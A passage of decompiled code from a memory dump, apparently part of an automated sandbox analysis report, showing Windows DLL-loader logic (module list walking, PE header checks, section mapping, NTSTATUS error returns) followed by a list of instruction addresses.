						_v164 = _t200;
						if( *((char*)(_t200 + _t363)) != 0) {
							goto L109;
						} else {
							while(1) {
								L5:
								_t353 = 0;
								_t342 = 0x1000;
								_v176 = 0;
								if(_t287 == 0) {
									break;
								}
								_t384 = _t287 -  *0x1ed47b90; // 0x77df0000
								if(_t384 == 0) {
									_t353 =  *0x1ed47b8c; // 0x2e52be8
									_v176 = _t353;
									_t320 = ( *(_t353 + 0x50))[8];
									_v184 = _t320;
								} else {
									E1EC72280(_t200, 0x1ed484d8);
									_t277 =  *0x1ed485f4; // 0x2e53cb0
									_t351 =  *0x1ed485f8 & 1;
									while(_t277 != 0) {
										_t337 =  *(_t277 - 0x50);
										if(_t337 > _t287) {
											_t338 = _t337 | 0xffffffff;
										} else {
											asm("sbb ecx, ecx");
											_t338 =  ~_t337;
										}
										_t387 = _t338;
										if(_t387 < 0) {
											_t339 =  *_t277;
											__eflags = _t351;
											if(_t351 != 0) {
												__eflags = _t339;
												if(_t339 == 0) {
													goto L16;
												} else {
													goto L118;
												}
												goto L151;
											} else {
												goto L16;
											}
											goto L17;
										} else {
											if(_t387 <= 0) {
												__eflags = _t277;
												if(_t277 != 0) {
													_t340 =  *(_t277 - 0x18);
													_t24 = _t277 - 0x68; // 0x2e53c48
													_t353 = _t24;
													_v176 = _t353;
													__eflags = _t340[3] - 0xffffffff;
													if(_t340[3] != 0xffffffff) {
														_t279 =  *_t340;
														__eflags =  *(_t279 - 0x20) & 0x00000020;
														if(( *(_t279 - 0x20) & 0x00000020) == 0) {
															asm("lock inc dword [edi+0x9c]");
															_t340 =  *(_t353 + 0x50);
														}
													}
													_v184 = _t340[8];
												}
											} else {
												_t339 =  *(_t277 + 4);
												if(_t351 != 0) {
													__eflags = _t339;
													if(_t339 == 0) {
														goto L16;
													} else {
														L118:
														_t277 = _t277 ^ _t339;
														goto L17;
													}
													goto L151;
												} else {
													L16:
													_t277 = _t339;
												}
												goto L17;
											}
										}
										goto L25;
										L17:
									}
									L25:
									E1EC6FFB0(_t287, _t353, 0x1ed484d8);
									_t320 = _v184;
									_t342 = 0x1000;
								}
								if(_t353 == 0) {
									break;
								} else {
									_t366 = 0;
									if(( *( *[fs:0x18] + 0xfca) & _t342) != 0 || _t320 >= _v188) {
										_t288 = _v164;
										if(_t353 != 0) {
											_t342 = _t288;
											_t374 = E1ECACC99(_t353, _t288, _v200, 1,  &_v168);
											if(_t374 >= 0) {
												if(_v184 == 7) {
													__eflags = _a20;
													if(__eflags == 0) {
														__eflags =  *( *[fs:0x18] + 0xfca) & 0x00001000;
														if(__eflags != 0) {
															_t271 = E1EC66600(0x1ed452d8);
															__eflags = _t271;
															if(__eflags == 0) {
																_t342 = 0;
																_v169 = _t271;
																_t374 = E1EC67926( *(_t353 + 0x50), 0,  &_v169);
															}
														}
													}
												}
												if(_t374 < 0) {
													_v168 = 0;
												} else {
													if( *0x1ed4b239 != 0) {
														_t342 =  *(_t353 + 0x18);
														E1ECDE974(_v180,  *(_t353 + 0x18), __eflags, _v168, 0,  &_v168);
													}
													if( *0x1ed48472 != 0) {
														_v192 = 0;
														_t342 =  *0x7ffe0330;
														_t361 =  *0x1ed4b218; // 0x0
														asm("ror edi, cl");
														 *0x1ed4b1e0( &_v192, _t353, _v168, 0, _v180);
														 *(_t361 ^  *0x7ffe0330)();
														_t269 = _v192;
														_t353 = _v176;
														__eflags = _t269;
														if(__eflags != 0) {
															_v168 = _t269;
														}
													}
												}
											}
											if(_t374 == 0xc0000135 || _t374 == 0xc0000142) {
												_t366 = 0xc000007a;
											}
											_t247 =  *(_t353 + 0x50);
											if(_t247[3] == 0xffffffff) {
												L40:
												if(_t366 == 0xc000007a) {
													__eflags = _t288;
													if(_t288 == 0) {
														goto L136;
													} else {
														_t366 = 0xc0000139;
													}
													goto L54;
												}
											} else {
												_t249 =  *_t247;
												if(( *(_t249 - 0x20) & 0x00000020) != 0) {
													goto L40;
												} else {
													_t250 = _t249 | 0xffffffff;
													asm("lock xadd [edi+0x9c], eax");
													if((_t249 | 0xffffffff) == 0) {
														E1EC72280(_t250, 0x1ed484d8);
														_t342 =  *(_t353 + 0x54);
														_t165 = _t353 + 0x54; // 0x54
														_t252 = _t165;
														__eflags =  *(_t342 + 4) - _t252;
														if( *(_t342 + 4) != _t252) {
															L135:
															asm("int 0x29");
															L136:
															_t288 = _v200;
															_t366 = 0xc0000138;
															L54:
															_t342 = _t288;
															L1EC93898(0, _t288, _t366);
														} else {
															_t324 =  *(_t252 + 4);
															__eflags =  *_t324 - _t252;
															if( *_t324 != _t252) {
																goto L135;
															} else {
																 *_t324 = _t342;
																 *(_t342 + 4) = _t324;
																_t293 =  *(_t353 + 0x50);
																_v180 =  *_t293;
																E1EC6FFB0(_t293, _t353, 0x1ed484d8);
																__eflags =  *((short*)(_t353 + 0x3a));
																if( *((short*)(_t353 + 0x3a)) != 0) {
																	_t342 = 0;
																	__eflags = 0;
																	E1EC937F5(_t353, 0);
																}
																E1EC90413(_t353);
																_t256 =  *(_t353 + 0x48);
																__eflags = _t256;
																if(_t256 != 0) {
																	__eflags = _t256 - 0xffffffff;
																	if(_t256 != 0xffffffff) {
																		E1EC89B10(_t256);
																	}
																}
																__eflags =  *(_t353 + 0x28);
																if( *(_t353 + 0x28) != 0) {
																	_t174 = _t353 + 0x24; // 0x24
																	E1EC802D6(_t174);
																}
																L1EC777F0( *0x1ed47b98, 0, _t353);
																__eflags = _v180 - _t293;
																if(__eflags == 0) {
																	E1EC8C277(_t293, _t366);
																}
																_t288 = _v164;
																goto L40;
															}
														}
													} else {
														goto L40;
													}
												}
											}
										}
									} else {
										L1EC6EC7F(_t353);
										L1EC819B8(_t287, 0, _t353, 0);
										_t200 = E1EC5F4E3(__eflags);
										continue;
									}
								}
								L41:
								if(_v157 != 0) {
									L1EC777F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t288);
								}
								if(_t366 < 0) {
									L46:
									 *_v212 = _v168;
									_t204 = _t366;
									L47:
									_pop(_t354);
									_pop(_t367);
									_pop(_t289);
									return E1EC9B640(_t204, _t289, _v8 ^ _t376, _t342, _t354, _t367);
								} else {
									_t206 =  *0x1ed4b2f8; // 0x9d0000
									if((_t206 |  *0x1ed4b2fc) == 0 || ( *0x1ed4b2e4 & 0x00000001) != 0) {
										goto L46;
									} else {
										_t297 =  *0x1ed4b2ec; // 0x100
										_v200 = 0;
										if((_t297 >> 0x00000008 & 0x00000003) == 3) {
											_t355 = _v168;
											_t342 =  &_v208;
											_t208 = E1ED06B68(_v168,  &_v208, _v168, __eflags);
											__eflags = _t208 - 1;
											if(_t208 == 1) {
												goto L46;
											} else {
												__eflags = _v208 & 0x00000010;
												if((_v208 & 0x00000010) == 0) {
													goto L46;
												} else {
													_t342 = 4;
													_t366 = E1ED06AEB(_t355, 4,  &_v216);
													__eflags = _t366;
													if(_t366 >= 0) {
														goto L46;
													} else {
														asm("int 0x29");
														_t356 = 0;
														_v44 = 0;
														_t290 = _v52;
														__eflags = 0;
														if(0 == 0) {
															L108:
															_t356 = 0;
															_v44 = 0;
															goto L63;
														} else {
															__eflags = 0;
															if(0 < 0) {
																goto L108;
															}
															L63:
															_v112 = _t356;
															__eflags = _t356;
															if(_t356 == 0) {
																L143:
																_v8 = 0xfffffffe;
																_t211 = 0xc0000089;
															} else {
																_v36 = 0;
																_v60 = 0;
																_v48 = 0;
																_v68 = 0;
																_v44 = _t290 & 0xfffffffc;
																E1EC6E9C0(1, _t290 & 0xfffffffc, 0, 0,  &_v68);
																_t306 = _v68;
																__eflags = _t306;
																if(_t306 == 0) {
																	_t216 = 0xc000007b;
																	_v36 = 0xc000007b;
																	_t307 = _v60;
																} else {
																	__eflags = _t290 & 0x00000001;
																	if(__eflags == 0) {
																		_t349 =  *(_t306 + 0x18) & 0x0000ffff;
																		__eflags = _t349 - 0x10b;
																		if(_t349 != 0x10b) {
																			__eflags = _t349 - 0x20b;
																			if(_t349 == 0x20b) {
																				goto L102;
																			} else {
																				_t307 = 0;
																				_v48 = 0;
																				_t216 = 0xc000007b;
																				_v36 = 0xc000007b;
																				goto L71;
																			}
																		} else {
																			L102:
																			_t307 =  *(_t306 + 0x50);
																			goto L69;
																		}
																		goto L151;
																	} else {
																		_t239 = L1EC6EAEA(_t290, _t290, _t356, _t366, __eflags);
																		_t307 = _t239;
																		_v60 = _t307;
																		_v48 = _t307;
																		__eflags = _t307;
																		if(_t307 != 0) {
																			L70:
																			_t216 = _v36;
																		} else {
																			_push(_t239);
																			_push(0x14);
																			_push( &_v144);
																			_push(3);
																			_push(_v44);
																			_push(0xffffffff);
																			_t319 = E1EC99730();
																			_v36 = _t319;
																			__eflags = _t319;
																			if(_t319 < 0) {
																				_t216 = 0xc000001f;
																				_v36 = 0xc000001f;
																				_t307 = _v60;
																			} else {
																				_t307 = _v132;
																				L69:
																				_v48 = _t307;
																				goto L70;
																			}
																		}
																	}
																}
																L71:
																_v72 = _t307;
																_v84 = _t216;
																__eflags = _t216 - 0xc000007b;
																if(_t216 == 0xc000007b) {
																	L150:
																	_v8 = 0xfffffffe;
																	_t211 = 0xc000007b;
																} else {
																	_t344 = _t290 & 0xfffffffc;
																	_v76 = _t344;
																	__eflags = _v40 - _t344;
																	if(_v40 <= _t344) {
																		goto L150;
																	} else {
																		__eflags = _t307;
																		if(_t307 == 0) {
																			L75:
																			_t217 = 0;
																			_v104 = 0;
																			__eflags = _t366;
																			if(_t366 != 0) {
																				__eflags = _t290 & 0x00000001;
																				if((_t290 & 0x00000001) != 0) {
																					_t217 = 1;
																					_v104 = 1;
																				}
																				_t290 = _v44;
																				_v52 = _t290;
																			}
																			__eflags = _t217 - 1;
																			if(_t217 != 1) {
																				_t369 = 0;
																				_t218 = _v40;
																				goto L91;
																			} else {
																				_v64 = 0;
																				E1EC6E9C0(1, _t290, 0, 0,  &_v64);
																				_t309 = _v64;
																				_v108 = _t309;
																				__eflags = _t309;
																				if(_t309 == 0) {
																					goto L143;
																				} else {
																					_t226 =  *(_t309 + 0x18) & 0x0000ffff;
																					__eflags = _t226 - 0x10b;
																					if(_t226 != 0x10b) {
																						__eflags = _t226 - 0x20b;
																						if(_t226 != 0x20b) {
																							goto L143;
																						} else {
																							_t371 =  *(_t309 + 0x98);
																							goto L83;
																						}
																					} else {
																						_t371 =  *(_t309 + 0x88);
																						L83:
																						__eflags = _t371;
																						if(_t371 != 0) {
																							_v80 = _t371 - _t356 + _t290;
																							_t310 = _v64;
																							_t348 = _t310 + 0x18 + ( *(_t309 + 0x14) & 0x0000ffff);
																							_t292 =  *(_t310 + 6) & 0x0000ffff;
																							_t311 = 0;
																							__eflags = 0;
																							while(1) {
																								_v120 = _t311;
																								_v116 = _t348;
																								__eflags = _t311 - _t292;
																								if(_t311 >= _t292) {
																									goto L143;
																								}
																								_t359 =  *((intOrPtr*)(_t348 + 0xc));
																								__eflags = _t371 - _t359;
																								if(_t371 < _t359) {
																									L98:
																									_t348 = _t348 + 0x28;
																									_t311 = _t311 + 1;
																									continue;
																								} else {
																									__eflags = _t371 -  *((intOrPtr*)(_t348 + 0x10)) + _t359;
																									if(_t371 >=  *((intOrPtr*)(_t348 + 0x10)) + _t359) {
																										goto L98;
																									} else {
																										__eflags = _t348;
																										if(_t348 == 0) {
																											goto L143;
																										} else {
																											_t218 = _v40;
																											_t312 =  *_t218;
																											__eflags = _t312 -  *((intOrPtr*)(_t348 + 8));
																											if(_t312 >  *((intOrPtr*)(_t348 + 8))) {
																												_v100 = _t359;
																												_t360 = _v108;
																												_t372 = L1EC68F44(_v108, _t312);
																												__eflags = _t372;
																												if(_t372 == 0) {
																													goto L143;
																												} else {
																													_t290 = _v52;
																													_t369 = _v80 +  *((intOrPtr*)(_t372 + 0xc)) - _v100 + _v112 - E1EC93C00(_t360, _t290,  *((intOrPtr*)(_t372 + 0xc)));
																													_t307 = _v72;
																													_t344 = _v76;
																													_t218 = _v40;
																													goto L91;
																												}
																											} else {
																												_t290 = _v52;
																												_t307 = _v72;
																												_t344 = _v76;
																												_t369 = _v80;
																												L91:
																												_t358 = _a4;
																												__eflags = _t358;
																												if(_t358 == 0) {
																													L95:
																													_t308 = _a8;
																													__eflags = _t308;
																													if(_t308 != 0) {
																														 *_t308 =  *((intOrPtr*)(_v40 + 4));
																													}
																													_v8 = 0xfffffffe;
																													_t211 = _v84;
																												} else {
																													_t370 =  *_t218 - _t369 + _t290;
																													 *_t358 = _t370;
																													__eflags = _t370 - _t344;
																													if(_t370 <= _t344) {
																														L149:
																														 *_t358 = 0;
																														goto L150;
																													} else {
																														__eflags = _t307;
																														if(_t307 == 0) {
																															goto L95;
																														} else {
																															__eflags = _t370 - _t344 + _t307;
																															if(_t370 >= _t344 + _t307) {
																																goto L149;
																															} else {
																																goto L95;
																															}
																														}
																													}
																												}
																											}
																										}
																									}
																								}
																								goto L97;
																							}
																						}
																						goto L143;
																					}
																				}
																			}
																		} else {
																			__eflags = _v40 - _t307 + _t344;
																			if(_v40 >= _t307 + _t344) {
																				goto L150;
																			} else {
																				goto L75;
																			}
																		}
																	}
																}
															}
															L97:
															 *[fs:0x0] = _v20;
															return _t211;
														}
													}
												}
											}
										} else {
											goto L46;
										}
									}
								}
								goto L151;
							}
							_t288 = _v164;
							_t366 = 0xc0000135;
							goto L41;
						}
					}
				}
				L151:
			}








































































































                                                            0x1ec6d5f2
                                                            0x1ec6d5f5
                                                            0x1ec6d5f5
                                                            0x1ec6d5fd
                                                            0x1ec6d600
                                                            0x1ec6d60a
                                                            0x1ec6d60d
                                                            0x1ec6d617
                                                            0x1ec6d61d
                                                            0x1ec6d627
                                                            0x1ec6d62e
                                                            0x1ec6d911
                                                            0x1ec6d913
                                                            0x00000000
                                                            0x1ec6d919
                                                            0x1ec6d919
                                                            0x1ec6d919
                                                            0x1ec6d634
                                                            0x1ec6d634
                                                            0x1ec6d634
                                                            0x1ec6d634
                                                            0x1ec6d640
                                                            0x1ec6d8bf
                                                            0x00000000
                                                            0x1ec6d646
                                                            0x1ec6d646
                                                            0x1ec6d64d
                                                            0x1ec6d652
                                                            0x1ecbb2fc
                                                            0x1ecbb2fc
                                                            0x1ecbb302
                                                            0x1ecbb33b
                                                            0x1ecbb341
                                                            0x00000000
                                                            0x1ecbb304
                                                            0x1ecbb304
                                                            0x1ecbb319
                                                            0x1ecbb31e
                                                            0x1ecbb324
                                                            0x1ecbb326
                                                            0x1ecbb332
                                                            0x1ecbb347
                                                            0x1ecbb34c
                                                            0x1ecbb351
                                                            0x1ecbb35a
                                                            0x00000000
                                                            0x1ecbb328
                                                            0x1ecbb328
                                                            0x00000000
                                                            0x1ecbb328
                                                            0x1ecbb326
                                                            0x1ec6d658
                                                            0x1ec6d658
                                                            0x1ec6d65b
                                                            0x1ec6d665
                                                            0x00000000
                                                            0x1ec6d66b
                                                            0x1ec6d66b
                                                            0x1ec6d66b
                                                            0x1ec6d66b
                                                            0x1ec6d66d
                                                            0x1ec6d672
                                                            0x1ec6d67a
                                                            0x00000000
                                                            0x00000000
                                                            0x1ec6d680
                                                            0x1ec6d686
                                                            0x1ec6d8ce
                                                            0x1ec6d8d4
                                                            0x1ec6d8dd
                                                            0x1ec6d8e0
                                                            0x1ec6d68c
                                                            0x1ec6d691
                                                            0x1ec6d69d
                                                            0x1ec6d6a2
                                                            0x1ec6d6a7
                                                            0x1ec6d6b0
                                                            0x1ec6d6b5
                                                            0x1ec6d6e0
                                                            0x1ec6d6b7
                                                            0x1ec6d6b7
                                                            0x1ec6d6b9
                                                            0x1ec6d6b9
                                                            0x1ec6d6bb
                                                            0x1ec6d6bd
                                                            0x1ec6d6ce
                                                            0x1ec6d6d0
                                                            0x1ec6d6d2
                                                            0x1ecbb363
                                                            0x1ecbb365
                                                            0x00000000
                                                            0x1ecbb36b
                                                            0x00000000
                                                            0x1ecbb36b
                                                            0x00000000
                                                            0x00000000
                                                            0x00000000
                                                            0x00000000
                                                            0x00000000
                                                            0x1ec6d6bf
                                                            0x1ec6d6bf
                                                            0x1ec6d6e5
                                                            0x1ec6d6e7
                                                            0x1ec6d6e9
                                                            0x1ec6d6ec
                                                            0x1ec6d6ec
                                                            0x1ec6d6ef
                                                            0x1ec6d6f5
                                                            0x1ec6d6f9
                                                            0x1ec6d6fb
                                                            0x1ec6d6fd
                                                            0x1ec6d701
                                                            0x1ec6d703
                                                            0x1ec6d70a
                                                            0x1ec6d70a
                                                            0x1ec6d701
                                                            0x1ec6d710
                                                            0x1ec6d710
                                                            0x1ec6d6c1
                                                            0x1ec6d6c1
                                                            0x1ec6d6c6
                                                            0x1ecbb36d
                                                            0x1ecbb36f
                                                            0x00000000
                                                            0x1ecbb375
                                                            0x1ecbb375
                                                            0x1ecbb375
                                                            0x00000000
                                                            0x1ecbb375
                                                            0x00000000
                                                            0x1ec6d6cc
                                                            0x1ec6d6d8
                                                            0x1ec6d6d8
                                                            0x1ec6d6d8
                                                            0x00000000
                                                            0x1ec6d6c6
                                                            0x1ec6d6bf
                                                            0x00000000
                                                            0x1ec6d6da
                                                            0x1ec6d6da
                                                            0x1ec6d716
                                                            0x1ec6d71b
                                                            0x1ec6d720
                                                            0x1ec6d726
                                                            0x1ec6d726
                                                            0x1ec6d72d
                                                            0x00000000
                                                            0x1ec6d733
                                                            0x1ec6d739
                                                            0x1ec6d742
                                                            0x1ec6d750
                                                            0x1ec6d758
                                                            0x1ec6d764
                                                            0x1ec6d776
                                                            0x1ec6d77a
                                                            0x1ec6d783
                                                            0x1ec6d928
                                                            0x1ec6d92c
                                                            0x1ec6d93d
                                                            0x1ec6d944
                                                            0x1ec6d94f
                                                            0x1ec6d954
                                                            0x1ec6d956
                                                            0x1ec6d95f
                                                            0x1ec6d961
                                                            0x1ec6d973
                                                            0x1ec6d973
                                                            0x1ec6d956
                                                            0x1ec6d944
                                                            0x1ec6d92c
                                                            0x1ec6d78b
                                                            0x1ecbb394
                                                            0x1ec6d791
                                                            0x1ec6d798
                                                            0x1ecbb3a3
                                                            0x1ecbb3bb
                                                            0x1ecbb3bb
                                                            0x1ec6d7a5
                                                            0x1ec6d866
                                                            0x1ec6d870
                                                            0x1ec6d884
                                                            0x1ec6d892
                                                            0x1ec6d898
                                                            0x1ec6d89e
                                                            0x1ec6d8a0
                                                            0x1ec6d8a6
                                                            0x1ec6d8ac
                                                            0x1ec6d8ae
                                                            0x1ec6d8b4
                                                            0x1ec6d8b4
                                                            0x1ec6d8ae
                                                            0x1ec6d7a5
                                                            0x1ec6d78b
                                                            0x1ec6d7b1
                                                            0x1ecbb3c5
                                                            0x1ecbb3c5
                                                            0x1ec6d7c3
                                                            0x1ec6d7ca
                                                            0x1ec6d7e5
                                                            0x1ec6d7eb
                                                            0x1ec6d8eb
                                                            0x1ec6d8ed
                                                            0x00000000
                                                            0x1ec6d8f3
                                                            0x1ec6d8f3
                                                            0x1ec6d8f3
                                                            0x00000000
                                                            0x1ec6d8ed
                                                            0x1ec6d7cc
                                                            0x1ec6d7cc
                                                            0x1ec6d7d2
                                                            0x00000000
                                                            0x1ec6d7d4
                                                            0x1ec6d7d4
                                                            0x1ec6d7d7
                                                            0x1ec6d7df
                                                            0x1ecbb3d4
                                                            0x1ecbb3d9
                                                            0x1ecbb3dc
                                                            0x1ecbb3dc
                                                            0x1ecbb3df
                                                            0x1ecbb3e2
                                                            0x1ecbb468
                                                            0x1ecbb46d
                                                            0x1ecbb46f
                                                            0x1ecbb46f
                                                            0x1ecbb475
                                                            0x1ec6d8f8
                                                            0x1ec6d8f9
                                                            0x1ec6d8fd
                                                            0x1ecbb3e8
                                                            0x1ecbb3e8
                                                            0x1ecbb3eb
                                                            0x1ecbb3ed
                                                            0x00000000
                                                            0x1ecbb3ef
                                                            0x1ecbb3ef
                                                            0x1ecbb3f1
                                                            0x1ecbb3f4
                                                            0x1ecbb3fe
                                                            0x1ecbb404
                                                            0x1ecbb409
                                                            0x1ecbb40e
                                                            0x1ecbb410
                                                            0x1ecbb410
                                                            0x1ecbb414
                                                            0x1ecbb414
                                                            0x1ecbb41b
                                                            0x1ecbb420
                                                            0x1ecbb423
                                                            0x1ecbb425
                                                            0x1ecbb427
                                                            0x1ecbb42a
                                                            0x1ecbb42d
                                                            0x1ecbb42d
                                                            0x1ecbb42a
                                                            0x1ecbb432
                                                            0x1ecbb436
                                                            0x1ecbb438
                                                            0x1ecbb43b
                                                            0x1ecbb43b
                                                            0x1ecbb449
                                                            0x1ecbb44e
                                                            0x1ecbb454
                                                            0x1ecbb458
                                                            0x1ecbb458
                                                            0x1ecbb45d
                                                            0x00000000
                                                            0x1ecbb45d
                                                            0x1ecbb3ed
                                                            0x00000000
                                                            0x00000000
                                                            0x00000000
                                                            0x1ec6d7df
                                                            0x1ec6d7d2
                                                            0x1ec6d7ca
                                                            0x1ecbb37c
                                                            0x1ecbb37e
                                                            0x1ecbb385
                                                            0x1ecbb38a
                                                            0x00000000
                                                            0x1ecbb38a
                                                            0x1ec6d742
                                                            0x1ec6d7f1
                                                            0x1ec6d7f8
                                                            0x1ecbb49b
                                                            0x1ecbb49b
                                                            0x1ec6d800
                                                            0x1ec6d837
                                                            0x1ec6d843
                                                            0x1ec6d845
                                                            0x1ec6d847
                                                            0x1ec6d84a
                                                            0x1ec6d84b
                                                            0x1ec6d84e
                                                            0x1ec6d857
                                                            0x1ec6d802
                                                            0x1ec6d802
                                                            0x1ec6d80d
                                                            0x00000000
                                                            0x1ec6d818
                                                            0x1ec6d818
                                                            0x1ec6d824
                                                            0x1ec6d831
                                                            0x1ecbb4a5
                                                            0x1ecbb4ab
                                                            0x1ecbb4b3
                                                            0x1ecbb4b8
                                                            0x1ecbb4bb
                                                            0x00000000
                                                            0x1ecbb4c1
                                                            0x1ecbb4c1
                                                            0x1ecbb4c8
                                                            0x00000000
                                                            0x1ecbb4ce
                                                            0x1ecbb4d4
                                                            0x1ecbb4e1
                                                            0x1ecbb4e3
                                                            0x1ecbb4e5
                                                            0x00000000
                                                            0x1ecbb4eb
                                                            0x1ecbb4f0
                                                            0x1ecbb4f2
                                                            0x1ec6dac9
                                                            0x1ec6dacc
                                                            0x1ec6dacf
                                                            0x1ec6dad1
                                                            0x1ec6dd78
                                                            0x1ec6dd78
                                                            0x1ec6dcf2
                                                            0x00000000
                                                            0x1ec6dad7
                                                            0x1ec6dad9
                                                            0x1ec6dadb
                                                            0x00000000
                                                            0x00000000
                                                            0x1ec6dae1
                                                            0x1ec6dae1
                                                            0x1ec6dae4
                                                            0x1ec6dae6
                                                            0x1ecbb4f9
                                                            0x1ecbb4f9
                                                            0x1ecbb500
                                                            0x1ec6daec
                                                            0x1ec6daec
                                                            0x1ec6daf5
                                                            0x1ec6daf8
                                                            0x1ec6dafb
                                                            0x1ec6db03
                                                            0x1ec6db11
                                                            0x1ec6db16
                                                            0x1ec6db19
                                                            0x1ec6db1b
                                                            0x1ecbb52c
                                                            0x1ecbb531
                                                            0x1ecbb534
                                                            0x1ec6db21
                                                            0x1ec6db21
                                                            0x1ec6db24
                                                            0x1ec6dcd9
                                                            0x1ec6dce2
                                                            0x1ec6dce5
                                                            0x1ec6dd6a
                                                            0x1ec6dd6d
                                                            0x00000000
                                                            0x1ec6dd73
                                                            0x1ecbb51a
                                                            0x1ecbb51c
                                                            0x1ecbb51f
                                                            0x1ecbb524
                                                            0x00000000
                                                            0x1ecbb524
                                                            0x1ec6dce7
                                                            0x1ec6dce7
                                                            0x1ec6dce7
                                                            0x00000000
                                                            0x1ec6dce7
                                                            0x00000000
                                                            0x1ec6db2a
                                                            0x1ec6db2c
                                                            0x1ec6db31
                                                            0x1ec6db33
                                                            0x1ec6db36
                                                            0x1ec6db39
                                                            0x1ec6db3b
                                                            0x1ec6db66
                                                            0x1ec6db66
                                                            0x1ec6db3d
                                                            0x1ec6db3d
                                                            0x1ec6db3e
                                                            0x1ec6db46
                                                            0x1ec6db47
                                                            0x1ec6db49
                                                            0x1ec6db4c
                                                            0x1ec6db53
                                                            0x1ec6db55
                                                            0x1ec6db58
                                                            0x1ec6db5a
                                                            0x1ecbb50a
                                                            0x1ecbb50f
                                                            0x1ecbb512
                                                            0x1ec6db60
                                                            0x1ec6db60
                                                            0x1ec6db63
                                                            0x1ec6db63
                                                            0x00000000
                                                            0x1ec6db63
                                                            0x1ec6db5a
                                                            0x1ec6db3b
                                                            0x1ec6db24
                                                            0x1ec6db69
                                                            0x1ec6db69
                                                            0x1ec6db6c
                                                            0x1ec6db6f
                                                            0x1ec6db74
                                                            0x1ecbb557
                                                            0x1ecbb557
                                                            0x1ecbb55e
                                                            0x1ec6db7a
                                                            0x1ec6db7c
                                                            0x1ec6db7f
                                                            0x1ec6db82
                                                            0x1ec6db85
                                                            0x00000000
                                                            0x1ec6db8b
                                                            0x1ec6db8b
                                                            0x1ec6db8d
                                                            0x1ec6db9b
                                                            0x1ec6db9b
                                                            0x1ec6db9d
                                                            0x1ec6dba0
                                                            0x1ec6dba2
                                                            0x1ec6dba4
                                                            0x1ec6dba7
                                                            0x1ec6dba9
                                                            0x1ec6dbae
                                                            0x1ec6dbae
                                                            0x1ec6dbb1
                                                            0x1ec6dbb4
                                                            0x1ec6dbb4
                                                            0x1ec6dbb7
                                                            0x1ec6dbba
                                                            0x1ec6dcd2
                                                            0x1ec6dcd4
                                                            0x00000000
                                                            0x1ec6dbc0
                                                            0x1ec6dbc0
                                                            0x1ec6dbd2
                                                            0x1ec6dbd7
                                                            0x1ec6dbda
                                                            0x1ec6dbdd
                                                            0x1ec6dbdf
                                                            0x00000000
                                                            0x1ec6dbe5
                                                            0x1ec6dbe5
                                                            0x1ec6dbee
                                                            0x1ec6dbf1
                                                            0x1ecbb541
                                                            0x1ecbb544
                                                            0x00000000
                                                            0x1ecbb546
                                                            0x1ecbb546
                                                            0x00000000
                                                            0x1ecbb546
                                                            0x1ec6dbf7
                                                            0x1ec6dbf7
                                                            0x1ec6dbfd
                                                            0x1ec6dbfd
                                                            0x1ec6dbff
                                                            0x1ec6dc0b
                                                            0x1ec6dc15
                                                            0x1ec6dc1b
                                                            0x1ec6dc1d
                                                            0x1ec6dc21
                                                            0x1ec6dc21
                                                            0x1ec6dc23
                                                            0x1ec6dc23
                                                            0x1ec6dc26
                                                            0x1ec6dc29
                                                            0x1ec6dc2b
                                                            0x00000000
                                                            0x00000000
                                                            0x1ec6dc31
                                                            0x1ec6dc34
                                                            0x1ec6dc36
                                                            0x1ec6dcbf
                                                            0x1ec6dcbf
                                                            0x1ec6dcc2
                                                            0x00000000
                                                            0x1ec6dc3c
                                                            0x1ec6dc41
                                                            0x1ec6dc43
                                                            0x00000000
                                                            0x1ec6dc45
                                                            0x1ec6dc45
                                                            0x1ec6dc47
                                                            0x00000000
                                                            0x1ec6dc4d
                                                            0x1ec6dc4d
                                                            0x1ec6dc50
                                                            0x1ec6dc52
                                                            0x1ec6dc55
                                                            0x1ec6dcfa
                                                            0x1ec6dcfe
                                                            0x1ec6dd08
                                                            0x1ec6dd0a
                                                            0x1ec6dd0c
                                                            0x00000000
                                                            0x1ec6dd12
                                                            0x1ec6dd15
                                                            0x1ec6dd2d
                                                            0x1ec6dd2f
                                                            0x1ec6dd32
                                                            0x1ec6dd35
                                                            0x00000000
                                                            0x1ec6dd35
                                                            0x1ec6dc5b
                                                            0x1ec6dc5b
                                                            0x1ec6dc5e
                                                            0x1ec6dc61
                                                            0x1ec6dc64
                                                            0x1ec6dc67
                                                            0x1ec6dc67
                                                            0x1ec6dc6a
                                                            0x1ec6dc6c
                                                            0x1ec6dc8e
                                                            0x1ec6dc8e
                                                            0x1ec6dc91
                                                            0x1ec6dc93
                                                            0x1ec6dcce
                                                            0x1ec6dcce
                                                            0x1ec6dc95
                                                            0x1ec6dc9c
                                                            0x1ec6dc6e
                                                            0x1ec6dc72
                                                            0x1ec6dc75
                                                            0x1ec6dc77
                                                            0x1ec6dc79
                                                            0x1ecbb551
                                                            0x1ecbb551
                                                            0x00000000
                                                            0x1ec6dc7f
                                                            0x1ec6dc7f
                                                            0x1ec6dc81
                                                            0x00000000
                                                            0x1ec6dc83
                                                            0x1ec6dc86
                                                            0x1ec6dc88
                                                            0x00000000
                                                            0x00000000
                                                            0x00000000
                                                            0x00000000
                                                            0x1ec6dc88
                                                            0x1ec6dc81
                                                            0x1ec6dc79
                                                            0x1ec6dc6c
                                                            0x1ec6dc55
                                                            0x1ec6dc47
                                                            0x1ec6dc43
                                                            0x00000000
                                                            0x1ec6dc36
                                                            0x1ec6dc23
                                                            0x00000000
                                                            0x1ec6dbff
                                                            0x1ec6dbf1
                                                            0x1ec6dbdf
                                                            0x1ec6db8f
                                                            0x1ec6db92
                                                            0x1ec6db95
                                                            0x00000000
                                                            0x00000000
                                                            0x00000000
                                                            0x00000000
                                                            0x1ec6db95
                                                            0x1ec6db8d
                                                            0x1ec6db85
                                                            0x1ec6db74
                                                            0x1ec6dc9f
                                                            0x1ec6dca2
                                                            0x1ec6dcb0
                                                            0x1ec6dcb0
                                                            0x1ec6dad1
                                                            0x1ecbb4e5
                                                            0x1ecbb4c8
                                                            0x00000000
                                                            0x00000000
                                                            0x00000000
                                                            0x1ec6d831
                                                            0x1ec6d80d
                                                            0x00000000
                                                            0x1ec6d800
                                                            0x1ecbb47f
                                                            0x1ecbb485
                                                            0x00000000
                                                            0x1ecbb485
                                                            0x1ec6d665
                                                            0x1ec6d652
                                                            0x00000000

                                                            Memory Dump Source
                                                            • Source File: 00000017.00000002.741990964.000000001EC30000.00000040.00000800.00020000.00000000.sdmp, Offset: 1EC30000, based on PE: true
                                                            • Associated: 00000017.00000002.742092026.000000001ED4B000.00000040.00000800.00020000.00000000.sdmpDownload File
